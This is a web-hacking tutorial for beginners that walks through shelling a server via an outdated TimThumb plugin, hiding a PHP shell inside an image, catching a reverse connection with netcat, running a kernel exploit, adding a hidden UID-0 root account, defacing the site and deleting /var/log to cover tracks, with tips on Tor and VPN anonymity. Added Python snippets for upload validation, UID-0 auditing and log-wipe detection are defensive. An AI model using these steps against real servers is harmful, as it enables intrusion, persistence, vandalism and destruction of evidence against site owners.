eXploitLab4 | Information Technology


Defacing, rooting and persistence for beginners


Hey There,
There are quite a few tutorials when it comes to web hacking... but somewhere in all this knowledge, hacking the web server gets lost! So let's get going on this one... This tutorial is aimed at defacing, rooting and creating a persistent presence on the server, for beginners...
Web-Hacking is a huge topic that I could easily discuss for hours.
Today I decided to make a good start by creating this post-tutorial: How to Hack a Server... Everything you need to know.
DISCLAIMER: WHATEVER IT IS THAT YOU LEARN HERE SHOULD BE USED FOR WHITE HAT PURPOSES ONLY
Tools you need:
- Backtrack (www.backtrack-linux.org) OR Kali Linux (http://www.kali.org)
- Firefox (www.mozilla.org/en-US/firefox/new/) Included in Backtrack and Ubuntu
- Netcat (Included in Backtrack) If you are on other Linux environments, get it from nmap.org/ncat/.
- iCon2PHP (gnahackteam.wordpress.com/gnahackteam/icon2php/)
- A good shell (iCon2PHP Archive includes three great shells)
- A good VPN or Tor (More explanation below..)
- Acunetix Web Vulnerability Scanner (trial version is also available)
About the Tools:
Backtrack/ Kali
A Linux distribution based on Ubuntu/ Debian. It includes everything you need to become a good hacker. Apart from this, hacking behind a Linux system is better than a Windows one since most Websites are on Linux Servers.
Firefox
Firefox is the best browser for hacking. You can easily configure a proxy and you can download millions of add-ons among which you can find some for Hacking. Find more about Hacky addons for Firefox or you can get my collection from here.
Netcat - Netcat is a powerful networking tool. You will need this to root the server
iCon2PHP & Good Shells - You will use it if you upload any image to an Image Uploader at a Forum or Image Hosting Service. iCon2PHP Archive contains some of the top shells available
Good VPN or TOR (Proxies are good too) - While hacking you need to be anonymous so as not to find you (even if you forget to delete the logs). VPN stands for Virtual Private Network, and what it does is hide your IP and encrypt the data you send to and receive from the Internet. A good VPN solution for Windows machines is ProXPN. However, with VPN connections (especially when you are under a free VPN connection) your connection speed is really slow. So, I wouldn't recommend VPN unless you pay and get a paid account.
What I would recommend is Tor. Tor can be used from its bundle: Vidalia, which is a great tool for Windows, Mac and Linux that uses Proxies all over its network around the world so as to keep you anonymous and changing these Proxies every 5-10 minutes. I believe it is among the best solutions to keep you anonymous if you don't want to pay for a Paid VPN account
Apart from Tor, simple Proxies are good, but I wouldn't recommend them as much as I would Tor.
If I listed the above options according to their reliability :
1. Paid VPN Account at ProXPN
2. Tor
3. Free VPN Account at ProXPN
4. Proxy Connection
Acunetix Web Vulnerability Scanner - Scans for open ports, web vulnerabilities, directory listing. During the scan it lists the vulnerabilities and says how a hacker can exploit it and how to patch it. It also shows the severity of the vulnerability.
The Consultant Edition (For unlimited websites) costs about 3000-7000$.
____________________________________________________________
Starting the Main Tutorial:
So, here is the route we will follow:
Find a Vulnerable Website > Upload a c100 Shell (Hidden in an Image with iCon2PHP) > Rooting the Server > Defacing the Website > Covering your Tracks
-- Before we begin --
-Boot into Kali or Backtrack
-Connect to your VPN or to Tor
-Open Firefox
1. Finding a Vulnerable Website and Information about it:
Acunetix - Open and scan the website (use the standard profile, don't modify anything except if you know what you are doing). For this tutorial our website will be: www.site.com
Let's say we found a vulnerability using which we can upload a remote file (our shell) and have access to the website's files
The Warning should be something like this. It can mention other information or be a completely other warning (like for SQL Injection I will post a Tutorial on this also), too! (Depends on the Vulnerability) What we need at this tutorial is that we can exploit the File Inclusion Attack and Have access to the Website's Files. (This is not the warning we need for this tutorial, but it is related to what we do too.)
OK. Now, we have the site and the path that the vulnerability is. In our example let's say it is here:
The above vulnerability affects WordPress blogs that have installed certain plugins or themes and haven't updated to the latest version of TimThumb, which is an image-editing service on websites.
OK. Acunetix should also mention the OS of the Server. Assuming that ours is a Unix/Linux system (so as to show you how to root it).
For now, we don't have anything else to do with Acunetix
2. Uploading the shell:
Till now, we know:
-The website's blog has a huge vulnerability at TimThumb
-It is hosted on a Unix System
Next, because the vulnerability is located in an outdated TimThumb version, and TimThumb is a service to edit images, we need to upload the shell instead of the image.
Thus, download any image (I would recommend a small one) from Google Images. We don't care what it shows.
Generate Output with iCon2PHP
Copy your Image and your Shell to the Folder that iCon2PHP is located
Run the Program and follow the in-program instructions to build the finalImage.php
To avoid any errors while uploading rename the finalImage.php to image.php;.png (instead of png, type the image format your image was jpeg, jpg, gif, bmp, png etc.) This is exactly the same file but it confuses the uploader and thinks that it actually is an image.

Enter the Path of your Image: image.png
Please enter the path to the PHP: GnYshell.php
Entered!
Valid Files!
[...]
File: finalImage.php has been successfully created at the Current Directory
Upload Output to a Server:
Next, upload your image.php;.png into a free server. (000webhost, 0fees etc.)
Go to the vulnerability and type at the URL:
It would be better to create a subdomain like flickr.com (or other big image-hosting service) because sometimes it doesn't accept images from other websites.
Website. Shelled!
OK. Your website is shelled. This means that you should now have your shell uploaded and ready to root the server.
You could easily deface the website now but it would be better if you first rooted the server, so as to cover your tracks quickly.
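From the defender's side, the upload in this section only works when the server trusts the file name, the file content and the source host without checking them properly. The following is an added example, not part of the original post or of TimThumb's code: a Python validator that rejects the `image.php;.png` name, an image carrying a PHP tag, and a look-alike host. The allowlist entries and function names are assumptions made for illustration, as is the idea that the look-alike host passes because the fetcher compares hosts by substring.

```python
import os
import re
from urllib.parse import urlsplit

ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif", ".bmp"}
ALLOWED_HOSTS = {"flickr.com", "img.example.org"}  # assumption: hosts you trust
MAGIC = (b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff", b"GIF87a", b"GIF89a", b"BM")

def safe_image_name(filename):
    """Accept only 'name.ext': one dot, one allowlisted extension, no path."""
    if not re.fullmatch(r"[A-Za-z0-9_-]+\.[A-Za-z0-9]+", filename):
        return False  # rejects 'image.php;.png', 'a.php.png', '../x.png'
    return os.path.splitext(filename)[1].lower() in ALLOWED_EXT

def looks_like_image(data):
    """Require image magic bytes and refuse anything carrying a PHP open tag."""
    if not data.startswith(MAGIC):
        return False
    # Heuristic only: re-encoding the image and serving uploads from a
    # directory where scripts cannot execute are the stronger controls.
    return b"<?php" not in data.lower()

def host_allowed(url):
    """Match the parsed hostname exactly or as a true subdomain."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if parts.scheme not in ("http", "https"):
        return False
    # A substring test ('flickr.com' in url) would also pass
    # 'flickr.com.other.example'; suffix matching on the host does not.
    return any(host == h or host.endswith("." + h) for h in ALLOWED_HOSTS)

def accept_remote_image(url, data):
    """All three checks must pass before the file is stored."""
    name = urlsplit(url).path.rsplit("/", 1)[-1]
    return host_allowed(url) and safe_image_name(name) and looks_like_image(data)

if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32  # constructed sample bytes
    print(accept_remote_image("https://farm1.flickr.com/cat.png", png))
    print(accept_remote_image("http://flickr.com.other.example/image.php;.png", png))
```

Keeping TimThumb, plugins and themes updated remains the primary fix; these checks are defence in depth for any code that accepts images.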
3. Root the Server so as to be persistent:
Now that you have shelled your website we can start the process to root the server
What is rooting when it comes to Server Hacking?
Rooting a server is the procedure by which the hacker acquires root privileges on the whole server. If you don't understand this yet, I assure you that by the end of the section Rooting a server you will have understood exactly what it is.
Let's proceed to rooting
Connect via netcat:
1. Open a port at your router. For this tutorial I will be using 402. (Search Google on how to port forward. It is easier than it seems)
2. Open Terminal
3. Type:
netcat
4. Now type:
-l -n -v -p 402
5. It should have an output like this:
listening on [any] 402 port
6. Now, go to the Back-Connection function at the Shell
7. Complete with the following:
Host: YourIPAddress Port: 402 (or the port you forwarded)
8. Hit connect and Voila! Connected to the server!
Downloading and Executing the Kernel exploit:
1. Now, if you type:
whoami
you will see that you are not root yet
2. To do so we have to download a kernel exploit. The kernel version is mentioned at your shell. Find kernel exploits here
3. Download it to your HDD and then upload it to the server via the Shell. Unzip first, if zipped.
4. Now do the following exploit preparations:
The most usual types of exploits:
+++ Perl (.pl extension)
+++ C (.c extension)
(( If the program is in C you have first to compile it by typing: gcc exploit.c -o exploit ))
Change the permissions of the exploit:
chmod 777 exploit
5. Execute the exploit. Type:
./exploit
6. Root permissions acquired! Type this to ensure:
id
or
whoami
7. Add a new root user:
adduser -u 0 -o -g 0 -G 1,2,3,4,6,10 -M root1
where root1 is your desired username
8. Change the password of the new root user:
passwd root1
SUCCESSFULLY ROOTED!
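The account created in step 7 is easy for an administrator to spot, because it shares UID 0 with root. The following is an added example, not part of the original post: a Python audit of passwd-format text that reports any non-root account with UID 0 and any UID held by more than one account. The sample entries are constructed for illustration and the function name is an assumption.

```python
from collections import defaultdict

# Constructed sample in /etc/passwd format; root1 is the clone described above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
root1:x:0:0::/home/root1:/bin/sh
"""

def audit_passwd(text):
    """Return (account, finding) pairs for UID-0 clones and shared UIDs."""
    by_uid = defaultdict(list)
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            findings.append((f"line {lineno}", "malformed entry"))
            continue
        name, uid = fields[0], int(fields[2])
        by_uid[uid].append(name)
        if uid == 0 and name != "root":
            findings.append((name, "UID 0 on a non-root account"))
    # Non-unique UIDs should not occur on a normally managed system.
    for uid, names in sorted(by_uid.items()):
        if len(names) > 1:
            findings.append((",".join(names), f"UID {uid} shared (non-unique)"))
    return findings

if __name__ == "__main__":
    # Audit the constructed sample, then the live file if it is readable.
    for account, finding in audit_passwd(SAMPLE_PASSWD):
        print("sample:", account, "-", finding)
    try:
        with open("/etc/passwd") as fh:
            for account, finding in audit_passwd(fh.read()):
                print("live:", account, "-", finding)
    except OSError as exc:
        print("could not read /etc/passwd:", exc)
```

Some BSD systems ship a second UID-0 account named toor by default, so compare findings against a known-good baseline before raising an alert.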
4. Deface the Website:
What is defacing?
Defacing is the procedure by which the hacker uploads his own index webpage to alter the homepage of a site. In this way, he can boost his reputation or pass a message to the people or the company (which owns the website).
Since you got the website shelled, you just create a nice hacky page in html and upload it via the Shell as inbox.html (Delete or rename the website's one)
5. Cover your tracks:
Till now you were under the anonymity of Tor or ProXPN. You were very safe. However, in order to ensure that it will be impossible for the admin to locate you we have to delete logs.
First of all, Unix based machines have some logs that you have better to either edit or delete.
Common Linux log files name and their usage:
/var/log/messages: General messages and system-related entries
/var/log/auth.log: Authentication logs
/var/log/kern.log: Kernel logs
/var/log/cron.log: Crond logs (cron job)
/var/log/maillog: Mail server logs
/var/log/qmail/ : Qmail log directory (more files inside this directory)
/var/log/httpd/: Apache access and error logs directory
/var/log/lighttpd: Lighttpd access and error logs directory
/var/log/boot.log : System boot log
/var/log/mysqld.log: MySQL database server log file
/var/log/secure: Authentication log
/var/log/utmp or /var/log/wtmp : Login records file
/var/log/yum.log: Yum log files
In short, /var/log is the location where you should find all Linux log files.
To delete all of them by once type:
su root1
rm -rf /var/log
mkdir /var/log
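Deleting and recreating /var/log this way leaves its own evidence: an empty or nearly empty directory, no expected log files, and no entry older than the last boot. The following is an added example, not part of the original post: a Python check for those three signs. The expected file names, the grace period and the function name are assumptions, and the file list varies by distribution.

```python
import os
import time

# Assumption: at least one of these exists on a healthy host (distro-dependent).
EXPECTED = ("auth.log", "secure", "messages", "syslog", "wtmp")

def log_dir_findings(path, boot_time, expected=EXPECTED, grace=600):
    """Return signs that a log directory was wiped and recreated after boot."""
    if not os.path.isdir(path):
        return ["log directory missing"]
    entries = os.listdir(path)
    findings = []
    if not entries:
        findings.append("log directory is empty")
    if not any(name in entries for name in expected):
        findings.append("no expected log file present")
    # lstat so a dangling symlink cannot raise; mtime is a heuristic because
    # rotated archives and boot-time logs normally predate boot + grace.
    mtimes = [os.lstat(os.path.join(path, e)).st_mtime for e in entries]
    if mtimes and min(mtimes) > boot_time + grace:
        findings.append("every entry is newer than boot; older history is gone")
    return findings

def system_boot_time():
    """Boot time as a Unix timestamp, read from /proc/uptime (Linux only)."""
    with open("/proc/uptime") as fh:
        return time.time() - float(fh.read().split()[0])

if __name__ == "__main__":
    for finding in log_dir_findings("/var/log", system_boot_time()):
        print("ALERT:", finding)
```

Local checks like this can be removed by whoever holds root, so forward syslog to a separate collector as well; records already shipped off the host survive the deletion.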
That's about it! This is the method being used by most black hats when they want to deface servers and get persistent access to it.
Hope this helps
WTHack
Can we hack you before the hackers do?
